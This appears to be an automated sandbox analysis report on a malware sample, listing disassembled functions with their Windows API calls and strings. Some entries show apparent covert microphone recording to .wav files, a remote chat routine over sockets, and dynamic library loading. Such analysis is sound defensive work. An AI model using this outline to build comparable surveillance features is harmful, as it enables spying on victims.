API String ID: 2030045667-32948583
Opcode ID: e094a8a1570feeb5cfea54d261ba566cae89bd54c95985d64606c1bd350ff596
Instruction ID: 111895228522ab5043f934133c2ee2c1878ecd264c5f4288a9a079b1f125bb2f
Opcode Fuzzy Hash: e094a8a1570feeb5cfea54d261ba566cae89bd54c95985d64606c1bd350ff596
Instruction Fuzzy Hash: 5BA1E470E042A48BDF21AA2CCC80BD9B7E5FB49354F1440E5DD49AB386CB758AC5CF92

Function 2D22DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 2D22DB9A

Strings

\system32, xrefs: 2D22DAAE
SystemDrive, xrefs: 2D22DA91
UserProfile, xrefs: 2D22DB58
WinDir, xrefs: 2D22DA9B, 2D22DABD, 2D22DB0F
ProgramData, xrefs: 2D22DB5F
Temp, xrefs: 2D22DA66
AppData, xrefs: 2D22DB51
ProgramFiles, xrefs: 2D22DB6E
\SysWOW64, xrefs: 2D22DB00

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 30380484cb9b3efecb574092a05a21ac0341dce1c33fe198b242f69747669a8c
Instruction ID: 69020bab1d50260018c5918dd60837872c48abeacbf8b00377be74fc3ac3f2e4
Opcode Fuzzy Hash: 30380484cb9b3efecb574092a05a21ac0341dce1c33fe198b242f69747669a8c
Instruction Fuzzy Hash: A54134720CC6109AD315DB60DC98CAFB3A8EFB0251F11453EB655F61A5FF20BA49C6A2

Function 02C8A374 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02C8A394
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02C8A3AB
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02C8A3B1
IsBadReadPtr.KERNEL32(?,00000004), ref: 02C8A43F
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02C8A44B
IsBadReadPtr.KERNEL32(?,00000014), ref: 02C8A45F

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 02C8A3A6
LoadLibraryExA, xrefs: 02C8A3A1

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: 092ed908ca45a97bbb708290ae908102f5a616a6e1e3536d148182358926eba5
Instruction ID: 97b898f4a3a7e8679542a2e9c72e991a8e3b57e9de1dafe426ca3e4e682e241a
Opcode Fuzzy Hash: 092ed908ca45a97bbb708290ae908102f5a616a6e1e3536d148182358926eba5
Instruction Fuzzy Hash: 95317471A40705BBDF20EF64CC85F5AB7ACAF44728F509625EA149B281D370EA50DBA4

Function 2D25A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A892
GetLastError.KERNEL32(?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A89F
__dosmaperr.LIBCMT ref: 2D25A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A8D2
GetLastError.KERNEL32(?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A8DC
__dosmaperr.LIBCMT ref: 2D25A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,2D221D55,?), ref: 2D25A926
GetLastError.KERNEL32(?,?,?,?,?,?,2D221D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 2D25A930
__dosmaperr.LIBCMT ref: 2D25A937
_free.LIBCMT ref: 2D25A943
_free.LIBCMT ref: 2D25A94A

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 11934ec0e4c743f79af94ebf51fa01236b7b9bd185d2abf3ca454d284663c96f
Instruction ID: 73add80539ff2b1cd7aeb1247a476f0b7e013ea4b3d6ac813c42c06f4e38490b
Opcode Fuzzy Hash: 11934ec0e4c743f79af94ebf51fa01236b7b9bd185d2abf3ca454d284663c96f
Instruction Fuzzy Hash: C731C07144C24AAFDF059FA48C49DAF3B78FF06264F1142A9FA1076290EB31ED45DBA0

Function 2D2254A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 2D2254BF
GetMessageA.USER32 ref: 2D22556F
TranslateMessage.USER32(?), ref: 2D22557E
DispatchMessageA.USER32 ref: 2D225589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,2D294F78), ref: 2D225641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 2D225679

Part of subcall function 2D224AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 2D224B36

Strings

DisplayMessage, xrefs: 2D2255EC
CloseChat, xrefs: 2D225609
GetMessage, xrefs: 2D2255F8

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 6080d959f31a2b556c6f6c24c3064239b4880b54fa47cedb323eb26ae29b0e97
Instruction ID: 07aff8f91c7897caa95901af939cb922aa379b8cec52c4073738d3a694174abc
Opcode Fuzzy Hash: 6080d959f31a2b556c6f6c24c3064239b4880b54fa47cedb323eb26ae29b0e97
Instruction Fuzzy Hash: AA41C2325887116BCB11EB74CC9C9AF37B9EFA6610F41452CB652A7290EF38A905C792

Function 02C7252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

Unexpected Memory Leak, xrefs: 02C728C0
7, xrefs: 02C726A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02C72849
bytes: , xrefs: 02C7275D
The unexpected small block leaks are:, xrefs: 02C72707
An unexpected memory leak has occurred. , xrefs: 02C72690
, xrefs: 02C72814

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 8d15d863bd25b1e0ccffd60af125c03f9a1de04462ea42adde6717aff8e186a4
Instruction ID: 9ff1b5a73bce494ac3bf992bd42ed3b2223e9b6d85fb4f2fea72a850da47e955
Opcode Fuzzy Hash: 8d15d863bd25b1e0ccffd60af125c03f9a1de04462ea42adde6717aff8e186a4
Instruction Fuzzy Hash: 8E71C270E042A88FDB21AA2CCC84BD9BBF5FB49704F1441E5D949DB281DB758AC5CF92

Function 2D26B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 2D26B3FE
__fassign.LIBCMT ref: 2D26B479
__fassign.LIBCMT ref: 2D26B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 2D26B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,2D26BB31,00000000), ref: 2D26B4D9
WriteFile.KERNEL32(?,?,00000001,2D26BB31,00000000), ref: 2D26B512

Strings

Pk)-N)-, xrefs: 2D26B3BE

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: Pk)-N)-
API String ID: 1324828854-771429351
Opcode ID: e6a71e5230b4bd6f4ed46c434bdff7f0a65d54b28b57dea92a444696984f2de7
Instruction ID: 8339560bece6328f18ce31f4c96bb24d482c1e3834538c670d5652a01b0ed69c
Opcode Fuzzy Hash: e6a71e5230b4bd6f4ed46c434bdff7f0a65d54b28b57dea92a444696984f2de7
Instruction Fuzzy Hash: F55160719403499FDB10CFA8CC95AEEBBF8EF19710F14415AEA55F7281E7309A81CBA0

Function 2D221D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 2D221D50

Part of subcall function 2D221A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 2D221AD9

waveInUnprepareHeader.WINMM(2D292A88,00000020,00000000), ref: 2D221E02
waveInPrepareHeader.WINMM(2D292A88,00000020), ref: 2D221E40
waveInAddBuffer.WINMM(2D292A88,00000020), ref: 2D221E4F

Strings

%Y-%m-%d %H.%M, xrefs: 2D221D41
dM)-, xrefs: 2D221D81
|M)-, xrefs: 2D221E08
.wav, xrefs: 2D221D69

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dM)-$|M)-
API String ID: 3809562944-3745576182
Opcode ID: 25175db72d5a4a4e52e302c8bc0c6ee155b6ac69ce8ad7316d27460e51587dd4
Instruction ID: 3aeb83c82cc0ec293123f97c958de298b0e22e0f2180b919c6b460ff705f2cde
Opcode Fuzzy Hash: 25175db72d5a4a4e52e302c8bc0c6ee155b6ac69ce8ad7316d27460e51587dd4
Instruction Fuzzy Hash: 75315231548711AFC325DB20CC98EDB77B9EF64614F518439B259A22A0EF346909CB96

Function 2D231CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 2D23179C: SetLastError.KERNEL32(0000000D,2D231D1C,00000000,t^(-,?,?,?,?,?,?,?,?,?,?,?,2D231CFA), ref: 2D2317A2

SetLastError.KERNEL32(000000C1,00000000,t^(-,?,?,?,?,?,?,?,?,?,?,?,2D231CFA), ref: 2D231D37
GetNativeSystemInfo.KERNEL32(?), ref: 2D231DA5
SetLastError.KERNEL32(0000000E), ref: 2D231DC9

Part of subcall function 2D231CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,2D231DE7,?,00000000,00003000,00000040,00000000), ref: 2D231CB3

GetProcessHeap.KERNEL32(00000008,00000040), ref: 2D231E10
HeapAlloc.KERNEL32(00000000), ref: 2D231E17
SetLastError.KERNEL32(0000045A), ref: 2D231F2A

Part of subcall function 2D232077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,2D231F37), ref: 2D2320E7
Part of subcall function 2D232077: HeapFree.KERNEL32(00000000), ref: 2D2320EE

Strings

t^(-, xrefs: 2D231D02

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID: t^(-
API String ID: 3950776272-3149470130
Opcode ID: db163f43622671265bc614af37b23a5114702b79d3df28ccdbddf4d637a9542e
Instruction ID: 2f1dcf7a7e6768d2c642557105de5613b1c498e16d37b6b5b61e8b83e5638dfe
Opcode Fuzzy Hash: db163f43622671265bc614af37b23a5114702b79d3df28ccdbddf4d637a9542e
Instruction Fuzzy Hash: F46117F06943269BD7839F25CD80B7A7BA5FF49740F004529EE04AB281EB75E441CBE1

Function 02C7BD38 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02C7C003,?,?,00000000,00000000), ref: 02C7BD6E

Part of subcall function 02C7A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C7A75A

Strings

m/d/yy, xrefs: 02C7BE3D
AMPM, xrefs: 02C7BF82
AMPM , xrefs: 02C7BF91
mmmm d, yyyy, xrefs: 02C7BE6A
:mm, xrefs: 02C7BFA1
:mm:ss, xrefs: 02C7BFBE

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 5079e5a72f200bc49af25140bc6c5e8d4919ce35aec54b509953a81b33867113
Instruction ID: 7b8972bced0806af5072e1726e08ddde8456f9bf8eb2dd451d698b184a1b05c6
Opcode Fuzzy Hash: 5079e5a72f200bc49af25140bc6c5e8d4919ce35aec54b509953a81b33867113
Instruction Fuzzy Hash: E4618074B001499BDB14EBB8D890B9FB7BB9F88304F519435E101AB345CA35DE0AABE1

Function 2D275F04 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,2D276FFF), ref: 2D275F27

Strings

log10, xrefs: 2D275F71, 2D275FC1
acos, xrefs: 2D27609F
asin, xrefs: 2D276093
pow, xrefs: 2D27600B, 2D2760B7, 2D2760CA
log, xrefs: 2D275FCD, 2D275FD9
sqrt, xrefs: 2D2760AB

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$log$log10$pow$sqrt
API String ID: 3527080286-3190521889
Opcode ID: 7b07da8b776e4d41190c27005d8c0aee2777b734d54d758789b94973926d47aa
Instruction ID: dfd557eec42b6ffa169eb3f7f15b47dc52f5d6449be0660956d6bc36bced7c2e
Opcode Fuzzy Hash: 7b07da8b776e4d41190c27005d8c0aee2777b734d54d758789b94973926d47aa
Instruction Fuzzy Hash: E951937098064ACBEF21CF64DE889ECBBB4FF4A341F604295D440B7695CB359914CB2A

Function 2D22186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 2D2218BE
ExitThread.KERNEL32 ref: 2D2218F6
waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 2D221A04

Part of subcall function 2D254770: __onexit.LIBCMT ref: 2D254776

Strings

N)-, xrefs: 2D22190D
Pk)-, xrefs: 2D221888
XM)-, xrefs: 2D221902
N)-, xrefs: 2D221990

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: Pk)-$XM)-$N)-$N)-
API String ID: 1649129571-1371536499
Opcode ID: c436a3bab09b8c936e7ba1203de0e0efd3148bbe39bd7ac7785003ed40a47815
Instruction ID: 3b82413c9c9eaf7481b5b4e2525995ce91085d3e3b1da33a912303f393022a17
Opcode Fuzzy Hash: c436a3bab09b8c936e7ba1203de0e0efd3148bbe39bd7ac7785003ed40a47815
Instruction Fuzzy Hash: 7741BF711886909AC329DB24CCE8EEF73A5EFA0710F514539F255B62E0EF356906C716

Function 02C7432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C743F3,?,?,02CAE7C8,?,?,02C9A7A8,02C7655D,02C9930D), ref: 02C74365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 02C7436B
GetStdHandle.KERNEL32(000000F5,02C743B4,00000002,?,00000000,00000000,?,02C743F3,?,?,02CAE7C8,?,?,02C9A7A8,02C7655D,02C9930D), ref: 02C74380
WriteFile.KERNEL32(00000000,000000F5,02C743B4,00000002,?), ref: 02C74386
MessageBoxA.USER32 ref: 02C743A4

Strings

Error, xrefs: 02C74398
Runtime error at 00000000, xrefs: 02C7435E, 02C7439D

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 3f689f3bd81fa630903dbaaaa1d2fe5041a0d56b4b9a0e3741bfa7aeef279688
Instruction ID: 3eb4ac097e3486893b41249be2e45ac299ed5b60672640685f33ece8aa2bc708
Opcode Fuzzy Hash: 3f689f3bd81fa630903dbaaaa1d2fe5041a0d56b4b9a0e3741bfa7aeef279688
Instruction Fuzzy Hash: 6AF0B471AC43407AFA24A7B0AC4AF69277C5785F18F180B16B23CA90C087E492C4AB25

Function 2D269190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 2D269212
_free.LIBCMT ref: 2D269236
_free.LIBCMT ref: 2D2693BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2D27F234), ref: 2D2693CF
WideCharToMultiByte.KERNEL32(00000000,00000000,2D292764,000000FF,00000000,0000003F,00000000,?,?), ref: 2D269447
WideCharToMultiByte.KERNEL32(00000000,00000000,2D2927B8,000000FF,?,0000003F,00000000,?), ref: 2D269474
_free.LIBCMT ref: 2D269589

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 870e021d4758c7e5d9e6cabeb908a6365f6ecbe3031ab3d99adcddb3ac9bc75a
Instruction ID: 36e45f0cf7b504e0fc8a1b1876059b49505caf9fc517b07adf6dc751a7b23464
Opcode Fuzzy Hash: 870e021d4758c7e5d9e6cabeb908a6365f6ecbe3031ab3d99adcddb3ac9bc75a
Instruction Fuzzy Hash: 5DC12B719843459BDB098F74CC40BEABBB8EF56614F1441AAD654B7281EB319AC1CBF0

Function 2D270EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 2D270C41: _free.LIBCMT ref: 2D270C6A

_free.LIBCMT ref: 2D270F48

Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA

_free.LIBCMT ref: 2D270F53
_free.LIBCMT ref: 2D270F5E
_free.LIBCMT ref: 2D270FB2
_free.LIBCMT ref: 2D270FBD
_free.LIBCMT ref: 2D270FC8
_free.LIBCMT ref: 2D270FD3

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: 63e0a185bef4cdb045e3f364700028ee43c7acacef415c0140dfbc83fb9b3455
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: EB115E315C8744AAE531AB70CD45FDB7BBCEF10701F614838BBAD76190DAB4B94856A0

Function 02C87B3C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BBE
GetProcAddress.KERNEL32(00000000,KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BC4
GetCurrentProcess.KERNELBASE ref: 02C87BCE

Strings

GetCurre, xrefs: 02C87B55
KernelBase, xrefs: 02C87BB9
oces, xrefs: 02C87B8F

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: GetCurre$KernelBase$oces
API String ID: 4190356694-953896676
Opcode ID: 13dc8097f8545684a5a8b311ef78a8fd615a6d76f7dcf67af147793a0bcc951c
Instruction ID: f82068cb4e4e20378f258f73c2f8c3e88197f42cd90ad448b7c1671aa56dae13
Opcode Fuzzy Hash: 13dc8097f8545684a5a8b311ef78a8fd615a6d76f7dcf67af147793a0bcc951c
Instruction Fuzzy Hash: 66F0A4387847047FF725BBA0DC12F2AB7AEE744F09F718474B601A3A40E6B56914A925

Function 02C7AE3C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02C7ACB4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C7ACD1
Part of subcall function 02C7ACB4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C7ACF5
Part of subcall function 02C7ACB4: GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C7AD10
Part of subcall function 02C7ACB4: LoadStringA.USER32 ref: 02C7ADA6

CharToOemA.USER32 ref: 02C7AE73
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C7AE90
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 02C7AE96
GetStdHandle.KERNEL32(000000F4,02C7AF00,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C7AEAB
WriteFile.KERNEL32(00000000,000000F4,02C7AF00,00000002,?), ref: 02C7AEB1
LoadStringA.USER32 ref: 02C7AED3
MessageBoxA.USER32 ref: 02C7AEE9

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 25ecee5bc36cdc95992da39662b1c76c9bcaa8638c371870532f4d0985291401
Instruction ID: 2a5d82e9e6ca6b6d363130c67982c879e201927b67f7ee13fe4c2a248e0bd5f5
Opcode Fuzzy Hash: 25ecee5bc36cdc95992da39662b1c76c9bcaa8638c371870532f4d0985291401
Instruction Fuzzy Hash: 361127B2588204BEE300EBA4CC81F9F77EEAF54704F904A2AB754D71E0DA71D9449B62

Function 2D26333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,Pk)-N)-,2D2632EB,00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002), ref: 2D26335A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,Pk)-N)-,2D2632EB,00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002), ref: 2D26336D
FreeLibrary.KERNEL32(00000000,?,?,Pk)-N)-,2D2632EB,00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002,00000000,Pk)-N)-), ref: 2D263390

Strings

mscoree.dll, xrefs: 2D263353
CorExitProcess, xrefs: 2D263365
Pk)-N)-, xrefs: 2D26333C

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$Pk)-N)-$mscoree.dll
API String ID: 4061214504-3755321912
Opcode ID: 875196e56b0172339eb734433a1ca16ad61ef2b6048fadab091c2c7f43fb6486
Instruction ID: 39a3784b535822492c835f535eb779887fa74fbe35f7fa9ef449babdbcc286c5
Opcode Fuzzy Hash: 875196e56b0172339eb734433a1ca16ad61ef2b6048fadab091c2c7f43fb6486
Instruction Fuzzy Hash: B7F0A434A41209FBDB219F60CC4CBAEBFB5EF09B55F0041A8F905B22A0EB345A40CAD4

Function 2D25AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 2D25AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2D25AC85
__allrem.LIBCMT ref: 2D25AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2D25ACBA
__allrem.LIBCMT ref: 2D25ACD1
